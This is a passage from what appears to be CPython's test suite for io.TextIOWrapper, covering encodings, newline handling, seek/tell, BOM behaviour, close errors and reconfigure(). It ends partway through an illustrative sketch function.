# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getencoding()
b = self.BytesIO()
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio, encoding="utf-8").xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(os_helper.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(os_helper.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(os_helper.TESTFN, "wb") as f:
f.write(line*2)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(os_helper.TESTFN, "wb") as f:
f.write(data)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(os_helper.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(os_helper.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(os_helper.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable(), encoding="utf-8")
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"), encoding="utf-8")
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
    # read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO(), encoding="utf-8")
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertEqual(f.errors, "strict")
with self.open(os_helper.TESTFN, "w", encoding="utf-8", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@threading_helper.requires_working_threading()
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(os_helper.TESTFN, "w", encoding="utf-8", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with threading_helper.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(os_helper.TESTFN, encoding="utf-8") as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata), encoding="utf-8")
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
        # but utf-8-sig does not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
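
# Illustrative sketch (not part of the original test suite): the reconfigure()
# behaviour exercised by test_reconfigure_write above.  Switching the encoding
# mid-stream flushes pending text with the old encoder and encodes later
# writes with the new one.
def _reconfigure_encoding_sketch():
    import io
    raw = io.BytesIO()
    txt = io.TextIOWrapper(raw, encoding='latin1', newline='\n')
    txt.write('abc\xe9\n')
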